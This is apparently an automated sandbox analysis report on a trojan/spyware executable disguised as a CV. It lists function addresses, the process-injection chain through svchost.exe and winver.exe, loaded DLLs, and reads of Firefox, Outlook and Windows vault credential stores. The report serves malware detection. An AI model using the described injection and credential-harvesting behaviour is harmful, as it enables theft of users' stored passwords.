                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F75712_2_034F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DD5B02_2_034DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034314602_2_03431460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FF43F2_2_034FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FFB762_2_034FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B5BF02_2_034B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347DBF92_2_0347DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345FB802_2_0345FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FFA492_2_034FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F7A462_2_034F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B3A6C2_2_034B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EDAC62_2_034EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DDAAC2_2_034DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03485AA02_2_03485AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034499502_2_03449950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345B9502_2_0345B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AD8002_2_034AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034438E02_2_034438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FFF092_2_034FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03441F922_2_03441F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FFFB12_2_034FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03449EB02_2_03449EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03443D402_2_03443D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F1D5A2_2_034F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F7D732_2_034F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345FDC02_2_0345FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B9C322_2_034B9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FFCF22_2_034FFCF2
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_047524465_2_04752446
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_047444205_2_04744420
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0474E4F65_2_0474E4F6
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046A05355_2_046A0535
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_047605915_2_04760591
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046BC6E05_2_046BC6E0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046A07705_2_046A0770
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046C47505_2_046C4750
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0469C7C05_2_0469C7C0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_047320005_2_04732000
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_047281585_2_04728158
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046901005_2_04690100
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0473A1185_2_0473A118
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_047581CC5_2_047581CC
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_047541A25_2_047541A2
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_047601AA5_2_047601AA
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_047402745_2_04740274
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_047202C05_2_047202C0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0475A3525_2_0475A352
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_047603E65_2_047603E6
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046AE3F05_2_046AE3F0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046A0C005_2_046A0C00
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_04690CF25_2_04690CF2
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_04740CB55_2_04740CB5
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046AAD005_2_046AAD00
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0473CD1F5_2_0473CD1F
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0469ADE05_2_0469ADE0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046B8DBF5_2_046B8DBF
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046A0E595_2_046A0E59
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0475EE265_2_0475EE26
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0475EEDB5_2_0475EEDB
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0475CE935_2_0475CE93
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046B2E905_2_046B2E90
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_04714F405_2_04714F40
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_04742F305_2_04742F30
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046E2F285_2_046E2F28
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046C0F305_2_046C0F30
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046ACFE05_2_046ACFE0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_04692FC85_2_04692FC8
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0471EFA05_2_0471EFA0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046A28405_2_046A2840
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046AA8405_2_046AA840
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046CE8F05_2_046CE8F0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046868B85_2_046868B8
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046B69625_2_046B6962
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046A29A05_2_046A29A0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0476A9A65_2_0476A9A6
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0469EA805_2_0469EA80
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0475AB405_2_0475AB40
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_04756BD75_2_04756BD7
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046914605_2_04691460
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0475F43F5_2_0475F43F
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_047575715_2_04757571
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0473D5B05_2_0473D5B0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_047516CC5_2_047516CC
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0475F7B05_2_0475F7B0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0475F0E05_2_0475F0E0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_047570E95_2_047570E9
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046A70C05_2_046A70C0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0474F0CC5_2_0474F0CC
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046D516C5_2_046D516C
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0468F1725_2_0468F172
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0476B16B5_2_0476B16B
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046AB1B05_2_046AB1B0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_047412ED5_2_047412ED
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046BB2C05_2_046BB2C0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046A52A05_2_046A52A0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0468D34C5_2_0468D34C
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0475132D5_2_0475132D
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046E739A5_2_046E739A
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_04719C325_2_04719C32
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0475FCF25_2_0475FCF2
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_04757D735_2_04757D73
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046A3D405_2_046A3D40
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_04751D5A5_2_04751D5A
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046BFDC05_2_046BFDC0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046A9EB05_2_046A9EB0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0475FF095_2_0475FF09
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0475FFB15_2_0475FFB1
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046A1F925_2_046A1F92
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0470D8005_2_0470D800
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046A38E05_2_046A38E0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046A99505_2_046A9950
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046BB9505_2_046BB950
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_047359105_2_04735910
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_04713A6C5_2_04713A6C
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_04757A465_2_04757A46
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0475FA495_2_0475FA49
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0474DAC65_2_0474DAC6
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046E5AA05_2_046E5AA0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_04741AA35_2_04741AA3
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0473DAAC5_2_0473DAAC
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0475FB765_2_0475FB76
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_04715BF05_2_04715BF0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046DDBF95_2_046DDBF9
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_046BFB805_2_046BFB80
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_00361E305_2_00361E30
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0035CD105_2_0035CD10
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0035CD075_2_0035CD07
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0035CF305_2_0035CF30
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0035AF105_2_0035AF10
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0035B0605_2_0035B060
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0035B0555_2_0035B055
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0035B0A95_2_0035B0A9
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_003513715_2_00351371
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_003655005_2_00365500
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_003637105_2_00363710
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0036370B5_2_0036370B
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0037BBF05_2_0037BBF0
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0437E69D5_2_0437E69D
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0437D7685_2_0437D768
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0437E1E45_2_0437E1E4
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0437E3035_2_0437E303
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0437CA435_2_0437CA43
                Source: C:\Windows\SysWOW64\winver.exeCode function: String function: 0471F290 appears 105 times
                Source: C:\Windows\SysWOW64\winver.exeCode function: String function: 046D5130 appears 58 times
                Source: C:\Windows\SysWOW64\winver.exeCode function: String function: 0468B970 appears 280 times
                Source: C:\Windows\SysWOW64\winver.exeCode function: String function: 046E7E54 appears 102 times
                Source: C:\Windows\SysWOW64\winver.exeCode function: String function: 0470EA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 034BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 034AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0342B970 appears 274 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03475130 appears 37 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03487E54 appears 99 times
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: String function: 000DEC2F appears 68 times
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: String function: 000E6AC0 appears 42 times
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: String function: 000EF8A0 appears 35 times
                Source: CV Lic H&S Olivetti Renzo.exe, 00000000.00000003.2073753814.0000000004443000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs CV Lic H&S Olivetti Renzo.exe
                Source: CV Lic H&S Olivetti Renzo.exe, 00000000.00000003.2073871756.00000000045ED000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs CV Lic H&S Olivetti Renzo.exe
                Source: CV Lic H&S Olivetti Renzo.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@15/13
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_0010CE7A GetLastError,FormatMessageW,0_2_0010CE7A
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_000FAB84 AdjustTokenPrivileges,CloseHandle,0_2_000FAB84
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_000FB134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_000FB134
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_0010E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0010E1FD
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_00106532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_00106532
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_0011C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_0011C18C
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_000C406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_000C406B
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeFile created: C:\Users\user\AppData\Local\Temp\autEEE5.tmpJump to behavior
                Source: CV Lic H&S Olivetti Renzo.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: winver.exe, 00000005.00000003.2576231843.0000000002AEE000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000005.00000003.2576231843.0000000002AB9000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000005.00000003.2573732284.0000000002ACE000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000005.00000002.4525083909.0000000002A97000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000005.00000002.4525083909.0000000002AB9000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000005.00000002.4525083909.0000000002AEE000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000005.00000003.2573787560.0000000002AB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: CV Lic H&S Olivetti Renzo.exeReversingLabs: Detection: 63%
                Source: CV Lic H&S Olivetti Renzo.exeVirustotal: Detection: 50%
                Source: unknownProcess created: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe "C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe"
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe"
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exeProcess created: C:\Windows\SysWOW64\winver.exe "C:\Windows\SysWOW64\winver.exe"
                Source: C:\Windows\SysWOW64\winver.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe"Jump to behavior
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exeProcess created: C:\Windows\SysWOW64\winver.exe "C:\Windows\SysWOW64\winver.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\winver.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\winver.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: CV Lic H&S Olivetti Renzo.exeStatic file information: File size 1207296 > 1048576
                Source: CV Lic H&S Olivetti Renzo.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: CV Lic H&S Olivetti Renzo.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: CV Lic H&S Olivetti Renzo.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: CV Lic H&S Olivetti Renzo.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: CV Lic H&S Olivetti Renzo.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: CV Lic H&S Olivetti Renzo.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: CV Lic H&S Olivetti Renzo.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: winver.pdb source: svchost.exe, 00000002.00000003.2357425923.0000000002E3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2357366864.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, NObNfBLfyhvzeH.exe, 00000004.00000002.4525399562.00000000005F8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: NObNfBLfyhvzeH.exe, 00000004.00000002.4525085376.000000000049E000.00000002.00000001.01000000.00000005.sdmp, NObNfBLfyhvzeH.exe, 00000006.00000002.4524587511.000000000049E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: CV Lic H&S Olivetti Renzo.exe, 00000000.00000003.2074535912.0000000004320000.00000004.00001000.00020000.00000000.sdmp, CV Lic H&S Olivetti Renzo.exe, 00000000.00000003.2074686910.00000000044C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2388466530.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2294584292.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2388466530.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2292435039.0000000003000000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000005.00000002.4526687543.00000000047FE000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000005.00000002.4526687543.0000000004660000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000005.00000003.2388453751.00000000042D1000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000005.00000003.2390659558.00000000044B1000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: CV Lic H&S Olivetti Renzo.exe, 00000000.00000003.2074535912.0000000004320000.00000004.00001000.00020000.00000000.sdmp, CV Lic H&S Olivetti Renzo.exe, 00000000.00000003.2074686910.00000000044C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2388466530.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2294584292.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2388466530.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2292435039.0000000003000000.00000004.00000020.00020000.00000000.sdmp, winver.exe, winver.exe, 00000005.00000002.4526687543.00000000047FE000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000005.00000002.4526687543.0000000004660000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000005.00000003.2388453751.00000000042D1000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000005.00000003.2390659558.00000000044B1000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: winver.pdbGCTL source: svchost.exe, 00000002.00000003.2357425923.0000000002E3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2357366864.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, NObNfBLfyhvzeH.exe, 00000004.00000002.4525399562.00000000005F8000.00000004.00000020.00020000.00000000.sdmp
                Source: CV Lic H&S Olivetti Renzo.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: CV Lic H&S Olivetti Renzo.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: CV Lic H&S Olivetti Renzo.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: CV Lic H&S Olivetti Renzo.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: CV Lic H&S Olivetti Renzo.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_000DE01E LoadLibraryA,GetProcAddress,0_2_000DE01E
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_000E6B05 push ecx; ret 0_2_000E6B18
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00411948 push ss; retf 2_2_0041194E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040214C pushad ; retf 2_2_0040214D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416AAC push esp; retf 2_2_00416AAD
